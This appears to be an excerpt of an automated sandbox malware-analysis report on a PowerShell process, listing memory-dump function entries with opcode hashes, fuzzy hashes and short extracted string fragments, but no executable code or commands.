                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18a57be68be711cbe627c22f48f9f5ed6ac46ff09c55c1c8c6f48e76dd8c8d90
                                            • Instruction ID: 053de7ea68d2e9f3838a70a07d3a18c6027027ca37b3ead78fcd15784f52a11e
                                            • Opcode Fuzzy Hash: 18a57be68be711cbe627c22f48f9f5ed6ac46ff09c55c1c8c6f48e76dd8c8d90
                                            • Instruction Fuzzy Hash: FFB11C70E002099FDB14CFA9DD857DEBBF1AF48314F148529E855EB364EB74A886CB81
                                            Function 046B89E8 Relevance: .2, Instructions: 200COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed6b8660764467393a5ed354f99f6153eed09125e157d7a9ff59a1bd652c3323
                                            • Instruction ID: f254905bf87ff4a954321402b5daa376db8ca38481ec0121c32cc2d320cf26e0
                                            • Opcode Fuzzy Hash: ed6b8660764467393a5ed354f99f6153eed09125e157d7a9ff59a1bd652c3323
                                            • Instruction Fuzzy Hash: A7816D34A01244DFCB15EF64C4949ADBBF6FF89310F1884A9E4459B361E735ED85CB50
                                            Function 046B9948 Relevance: .2, Instructions: 191COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a438f588b01f454b87e59b0b771bee94093fc7051c3f8b657578d305063517e2
                                            • Instruction ID: 4392f10797bca54d1c3ab07f3328edf46d6cd48051d552ec06d6556073b641e7
                                            • Opcode Fuzzy Hash: a438f588b01f454b87e59b0b771bee94093fc7051c3f8b657578d305063517e2
                                            • Instruction Fuzzy Hash: 1E71B170A00245CFCB14DF68C480A9DBBF2FF85310F14856AD455EB791EB75AC4ACB80
                                            Function 046B9AB6 Relevance: .2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 208f09abca6ed0bf1f5d09adb904dcd4af8bdf802dc4605a8857a2bd32a657df
                                            • Instruction ID: becac0774c33230b88a4fa4a741eaca7601ac14ff94d2de40fca1fa2a16af5ff
                                            • Opcode Fuzzy Hash: 208f09abca6ed0bf1f5d09adb904dcd4af8bdf802dc4605a8857a2bd32a657df
                                            • Instruction Fuzzy Hash: 42714C70A002489FCB14DFA4D494AADBBF6FF88304F148469D555AB390EB35AC8ACB90
                                            Function 046BF968 Relevance: .2, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c531fda3bda4c481e5a2f37861662581063c4ad432ec8ec12410ea00a7db9af5
                                            • Instruction ID: 3069a12a029b7aa5b1d876177f6d5008d2824da3a05c5dc04ca5c086abaeae9e
                                            • Opcode Fuzzy Hash: c531fda3bda4c481e5a2f37861662581063c4ad432ec8ec12410ea00a7db9af5
                                            • Instruction Fuzzy Hash: 8E716F70E00249DFDB18CFA9C8957DEBBF2AF88314F148129D445E7364EB74A886CB81
                                            Function 046BF967 Relevance: .2, Instructions: 176COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5497b1ffbcb5f8a1f9056c517f4f0ac362737b8aa79389f081ccc99de963872e
                                            • Instruction ID: 84012e140e80fda3963324e6229a6e0b91debc5407580fd41f0da207a34fcc53
                                            • Opcode Fuzzy Hash: 5497b1ffbcb5f8a1f9056c517f4f0ac362737b8aa79389f081ccc99de963872e
                                            • Instruction Fuzzy Hash: 74715C70E00249DFDB18CFA8C9957DEBBF1AF88314F148129E455E7364EB74A886CB81
                                            Function 073EA385 Relevance: .1, Instructions: 134COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15abf64c2e235c392aa4d251f1db0340af51ec5bd2802eaa11a44a7e87cc9874
                                            • Instruction ID: e2bed16baf27669cd2c56b86b7a751ec3cd29efbc2d2ea28f3ed7a14d77fd2b7
                                            • Opcode Fuzzy Hash: 15abf64c2e235c392aa4d251f1db0340af51ec5bd2802eaa11a44a7e87cc9874
                                            • Instruction Fuzzy Hash: 9941BDF1B002358BEB1597B84415ABEBF9A9FC1314B14C4AAC509AF7D2CE32D80587A2
                                            Function 046B96D9 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f6320ae548d0c12de5246e4c53909fc65dbaaf6178286fdfdf0b484b1d47e91
                                            • Instruction ID: 4767080d73bd655552bdcc607ae43fc232aadc14299c238e970ac5a776f0b7ee
                                            • Opcode Fuzzy Hash: 5f6320ae548d0c12de5246e4c53909fc65dbaaf6178286fdfdf0b484b1d47e91
                                            • Instruction Fuzzy Hash: 79419E31B002009FDB14AB24C854AAEBBF6FF89710F09446CE542EB7A0DF34AC49DB90
                                            Function 046B9933 Relevance: .1, Instructions: 117COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01b21060d594a66211c16c1c28a113273c4615e96188d3cbc18dbe06685f6c50
                                            • Instruction ID: 86833febec39d6815d9fbaa9c8a096a3428706216b1e2fac6aa809568a8b08e4
                                            • Opcode Fuzzy Hash: 01b21060d594a66211c16c1c28a113273c4615e96188d3cbc18dbe06685f6c50
                                            • Instruction Fuzzy Hash: 35416D70A00249DFCB18DFA9C89479DBBF2FF84314F158469D446AB394EB74AC89CB90
                                            Function 073E7D36 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ffbb5b99e2e29bf461b7c19dbdd94cd207de5509a1ea45ecae068f01682ad5a
                                            • Instruction ID: adacb3c85ec34c70dd736e1466bda87d683bd6b732acf64f56975ae8a701ff59
                                            • Opcode Fuzzy Hash: 5ffbb5b99e2e29bf461b7c19dbdd94cd207de5509a1ea45ecae068f01682ad5a
                                            • Instruction Fuzzy Hash: DC31E3B4B40218AFE7049768C855FAFBB67ABD5344F208428E9057F3D5CF769C428B91
                                            Function 046B2B40 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc31fd436e3c27bece598b758a18e7090d5b8352892fd1fb78ef96cff7a4773b
                                            • Instruction ID: 3e156525d5101a4d4eb33e4663181bb96245ff0ca417af355f5cb77c4aa79f49
                                            • Opcode Fuzzy Hash: dc31fd436e3c27bece598b758a18e7090d5b8352892fd1fb78ef96cff7a4773b
                                            • Instruction Fuzzy Hash: 0C31B674A093959FC702DF6CD8A4AEABFF0EF4A214B0580D6D484DB363D624E845CBA5
                                            Function 073E0EE0 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c40e0b05ff61a5521a18875100fa425a83e2f7b08e8a5b6d0ef2ffa606c3b1d
                                            • Instruction ID: c544e947732768ce9cc06af863a01ec9d2363a0e57001a0caaa0f2407ff61b42
                                            • Opcode Fuzzy Hash: 3c40e0b05ff61a5521a18875100fa425a83e2f7b08e8a5b6d0ef2ffa606c3b1d
                                            • Instruction Fuzzy Hash: 162161B17103256BE728597AC895B3BB6DD9BC4710F348439A40DDB3C5CDB5D8528361
                                            Function 046BC4E8 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58324d582f599958ce2149dbf174aea8c7c4afa8393b6c2114dc0b69affbd466
                                            • Instruction ID: be45976f62dc1af3f2ab9d493c660e372874e57473659921559ef831277706e6
                                            • Opcode Fuzzy Hash: 58324d582f599958ce2149dbf174aea8c7c4afa8393b6c2114dc0b69affbd466
                                            • Instruction Fuzzy Hash: DF314930B012688FCB25DB24C9546EEB7B2BF89304F1544E9D509AB356DF35AE86CF81
                                            Function 073E0EC5 Relevance: .1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f9e1ee29493927236069e7043c6f3a2ae8a84cb80b840d8ed39b87fe731731d
                                            • Instruction ID: ee6e30bd333dca01e6526c683e6fa3f4f681f086e72832261694acbe8f661f8b
                                            • Opcode Fuzzy Hash: 6f9e1ee29493927236069e7043c6f3a2ae8a84cb80b840d8ed39b87fe731731d
                                            • Instruction Fuzzy Hash: E9219EB130436977E7280A7AC8547777BDD5F86700F388026E44CDB2C6C5B49896C361
                                            Function 046B3992 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fa006566e6856c2b2f9a6808a0a075cddf5ddb29c813f87160000386761563c
                                            • Instruction ID: 4e777895bddaab2295c042f9f567554433c62a4cc02be42f3e808a4f25ffead3
                                            • Opcode Fuzzy Hash: 5fa006566e6856c2b2f9a6808a0a075cddf5ddb29c813f87160000386761563c
                                            • Instruction Fuzzy Hash: 70212674A002059FCB05CF58C9949AAFBF1FF49310B2585AAE948EB361C331FD81CBA1
                                            Function 046B4A7A Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8da81c9427a3d26bd45c2d66ba73c042ab5bd2ca404c435d7e2a0ebf31dd7766
                                            • Instruction ID: 6d152bcf48c528b9cda50f95be02a62d54dc92aab6ba6e7be31546cfe5e1dd7d
                                            • Opcode Fuzzy Hash: 8da81c9427a3d26bd45c2d66ba73c042ab5bd2ca404c435d7e2a0ebf31dd7766
                                            • Instruction Fuzzy Hash: F4210774A002199FCB01CF59C980AAEFBB5FF48310B1485A5E949E7362C731FD91CBA0
                                            Function 046B2B30 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 366c74b15df885d01e2ed3672065a801c1327b4089a5270d9d432b338b531a8e
                                            • Instruction ID: fb98befc97460890d278a2cd0b6905ae5a732a0fd31ee08fbb89f3fc45508818
                                            • Opcode Fuzzy Hash: 366c74b15df885d01e2ed3672065a801c1327b4089a5270d9d432b338b531a8e
                                            • Instruction Fuzzy Hash: 052129B4E0020A8FCB00CF98D8909AABBF5FF49310B148499E809AB352D731FD41CBA1
                                            Function 073E0CD0 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d38ab7b4d89b4b1002b7d4c59347ffd460744f34fe6e0dce0cd08b9fd8ad5e56
                                            • Instruction ID: e90641079758535e2e45da2277a05859acd1890f5f37e1e98315b8ddb5941fd3
                                            • Opcode Fuzzy Hash: d38ab7b4d89b4b1002b7d4c59347ffd460744f34fe6e0dce0cd08b9fd8ad5e56
                                            • Instruction Fuzzy Hash: 6401D8773002295BD7285999D400667F79EDBC1221F24843AD94DCA285D6B2D455C760
                                            Function 046BF60B Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87efd345b680b02a67598de7cfdfb97ce1e7cc2d66c1bade0e0ea8f4fcf7f022
                                            • Instruction ID: ffda246ab0ef5aec766e2439db34c34eb9752afe6acb3b878689ff02684304c6
                                            • Opcode Fuzzy Hash: 87efd345b680b02a67598de7cfdfb97ce1e7cc2d66c1bade0e0ea8f4fcf7f022
                                            • Instruction Fuzzy Hash: 28117730E00149DBEF28DA94D9947ECB7B1AB1931DF141529C881F62B0FB7568CACF96
                                            Function 02DAD01D Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2008088158.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dad000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc3933e40dac43ee2e687d20b0ab32f10e57b8fc87ccd44a9c8bac6457b53ddb
                                            • Instruction ID: 7e50357fa656130a9cee79207646401c728c8f379b3684c713a685c575d20778
                                            • Opcode Fuzzy Hash: dc3933e40dac43ee2e687d20b0ab32f10e57b8fc87ccd44a9c8bac6457b53ddb
                                            • Instruction Fuzzy Hash: 8801F2714083409AE7208B29C995F67BFD9EF41324F28C42AEC480A786C779DC42C6B5
                                            Function 02DAD01C Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2008088158.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dad000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6aeefa7bd6b4ff1cddee1bfde51f5f8b6546a6dae02fdf9181e030e94c3dd44
                                            • Instruction ID: ea2d052397a0960aeb059bdacd7bed5f134c1d29276d68b6ae1fdf7ccb17374f
                                            • Opcode Fuzzy Hash: c6aeefa7bd6b4ff1cddee1bfde51f5f8b6546a6dae02fdf9181e030e94c3dd44
                                            • Instruction Fuzzy Hash: 18F0C271408340AEE7108E16C9C8B67FFE8EB41734F28C45AED480E686C3799841CAB1
                                            Function 073E32AC Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32cdb7c4b3c9839cbadf61fbc47f1c2490df2d85572dcaa3e8badd14d73eaa73
                                            • Instruction ID: 624c4787a1195f97b750176b22b22e8743d19f62a75c224595c80b70fdf56523
                                            • Opcode Fuzzy Hash: 32cdb7c4b3c9839cbadf61fbc47f1c2490df2d85572dcaa3e8badd14d73eaa73
                                            • Instruction Fuzzy Hash: 34F0A5B060E2D5DFE7128B54C955A10BFB5AF87208B1EC0DBC0989F1A7C7669886CB15

                                            Non-executed Functions

                                            Function 02DAD6E0 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2008088158.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dad000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4acccdca2fcced70c6b350963624ebccbba2c3bd903a0c84f7e186062ad70a22
                                            • Instruction ID: 60c22c1c439d00c7d09554a9426737eb9e8daa429713077b4a2b06ebfd70d9a7
                                            • Opcode Fuzzy Hash: 4acccdca2fcced70c6b350963624ebccbba2c3bd903a0c84f7e186062ad70a22
                                            • Instruction Fuzzy Hash: A4210076504200DFDB09DF14DAC0F2ABFA6FB88324F24C569E80A4B756C336DC56CAA1
                                            Function 073EC020 Relevance: 21.7, Strings: 17, Instructions: 498COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$84)l$84)l$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-242852452
                                            • Opcode ID: 4ff819bf90f4bec55251d107783bb86416cfb2343ff284368f0c1f7252e33840
                                            • Instruction ID: c0d423c9c682f08d23d3cd4a3848646d239a5d55f7f34140c2406f340eccb00d
                                            • Opcode Fuzzy Hash: 4ff819bf90f4bec55251d107783bb86416cfb2343ff284368f0c1f7252e33840
                                            • Instruction Fuzzy Hash: 71024BB0B00229CFEB258F69C4446AEBBEABF85710F14C46AD44D8F295DB31D845CBB1
                                            Function 073E25E8 Relevance: 12.8, Strings: 10, Instructions: 303COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-3512890053
                                            • Opcode ID: e4e0dc57e7d386a1369bb12b9b676eda69350df45e6ed6f16b0af6a17ecbb9b3
                                            • Instruction ID: 11573ee14ec14aaf235421444a8aaa2459794a07930ffa88340a249568e177ff
                                            • Opcode Fuzzy Hash: e4e0dc57e7d386a1369bb12b9b676eda69350df45e6ed6f16b0af6a17ecbb9b3
                                            • Instruction Fuzzy Hash: A6A15CB170462A9FEB254A29981067BBBEDBF81250F14847AD809CF3D6DE71CC85C3A1
                                            Function 073ED658 Relevance: 11.4, Strings: 9, Instructions: 196COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$84)l$tP^q$tP^q$$^q$(dq$(dq$(dq
                                            • API String ID: 0-1559462893
                                            • Opcode ID: 80afa4c3363a71cf7fe1c14c8fbb4ef6e403daf5c2c53b0a0e1ccd58722160d1
                                            • Instruction ID: ef3fcdddf1c6dd8e7bfbe7b0640b85177a0c86db2bdda024f99a95e5e678a2b5
                                            • Opcode Fuzzy Hash: 80afa4c3363a71cf7fe1c14c8fbb4ef6e403daf5c2c53b0a0e1ccd58722160d1
                                            • Instruction Fuzzy Hash: 9561A2B4B202299FEB24CF15C944B6AB7FAAB44710F198469EC4D6B2D0C731ED80CB51
                                            Function 073EE918 Relevance: 10.2, Strings: 8, Instructions: 191COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$(f+l$(f+l$4'^q$4'^q$4(l$4(l
                                            • API String ID: 0-2719617653
                                            • Opcode ID: 9b01ae4b554e190999111314ab1203de82869fdcbfdc026c7a182dc2abadf611
                                            • Instruction ID: 2a7ca3f347c25eda76b14f93a00829e06287d5f101d5e37247307d1e82edaeaf
                                            • Opcode Fuzzy Hash: 9b01ae4b554e190999111314ab1203de82869fdcbfdc026c7a182dc2abadf611
                                            • Instruction Fuzzy Hash: 5561F4B4B402199FFB14CB58C441A6ABBEABF84304F14856DD809AB794CF72EC45CB92
                                            Function 073ED308 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-1033743996
                                            • Opcode ID: 54c1187d1083b6584dcab2475f5a7ea3bcc98ac32817a8bbdbae02e2a1019bda
                                            • Instruction ID: 1daf55afb1cf1c108fc1a359a6722b7180cd717365d8142221a3a6829548b9ec
                                            • Opcode Fuzzy Hash: 54c1187d1083b6584dcab2475f5a7ea3bcc98ac32817a8bbdbae02e2a1019bda
                                            • Instruction Fuzzy Hash: FC51C5F072022ADFEB248E05C54476AB7BEBB45315F5484AAE80D5B6D4CB72EC84CF91
                                            Function 073ECDC1 Relevance: 8.9, Strings: 7, Instructions: 160COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$d%dq$d%dq$d%dq$tP^q$$^q
                                            • API String ID: 0-358516049
                                            • Opcode ID: 0c481cd7a1897ef8b382b0eca44d5ff5d776eeccd027ce0056e2254b2612d1db
                                            • Instruction ID: 76d77f9c9d756f865be6a51f03b4533491bdd42dff48ceee8aafee050be7f698
                                            • Opcode Fuzzy Hash: 0c481cd7a1897ef8b382b0eca44d5ff5d776eeccd027ce0056e2254b2612d1db
                                            • Instruction Fuzzy Hash: 005107F0B102659FEB248F14C550BAEBBEAAF85750F18905AE8099F6D1C731DD41CBB1
                                            Function 073EDD10 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-2078117423
                                            • Opcode ID: 5f8c805ef7c4c81dd0ebbcb7b204b99e7521bb21b150cbd10ffd8cebe349c5da
                                            • Instruction ID: 3dcaf65eecfe84a31a220a8a2ed6e0b2ea69c0288a09c37a71b5b05cb6542659
                                            • Opcode Fuzzy Hash: 5f8c805ef7c4c81dd0ebbcb7b204b99e7521bb21b150cbd10ffd8cebe349c5da
                                            • Instruction Fuzzy Hash: F861BDF172022ADBFF28CE15C5447BA77AEAF85311F148469E8085B6D4C731ED85CB91
                                            Function 073E1F78 Relevance: 7.6, Strings: 6, Instructions: 138COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$t~qq$$^q$$^q$$^q
                                            • API String ID: 0-2923853403
                                            • Opcode ID: 7843a80724cb19bba6f639893325f123e518cde6a17eb9d4522ba29c5a326c71
                                            • Instruction ID: edb74899ac6fe138828668445b313c217c39532d912139497ecc3aa145d3a4db
                                            • Opcode Fuzzy Hash: 7843a80724cb19bba6f639893325f123e518cde6a17eb9d4522ba29c5a326c71
                                            • Instruction Fuzzy Hash: B0418BB1B4026E9FEB281A698400277F79EBBC5210F24496AD5098F2C5DF32CC86C393
                                            Function 073ECF06 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$d%dq$d%dq$d%dq$tP^q
                                            • API String ID: 0-380581462
                                            • Opcode ID: 3a0fe680bb4cbd060925afecdd7a0a8ed0f8acef0d3defd8fe3b598c2e88d708
                                            • Instruction ID: 6ce28ec46d423100de3112760a8d20610163cac2a14cd198a08cfed018c28f36
                                            • Opcode Fuzzy Hash: 3a0fe680bb4cbd060925afecdd7a0a8ed0f8acef0d3defd8fe3b598c2e88d708
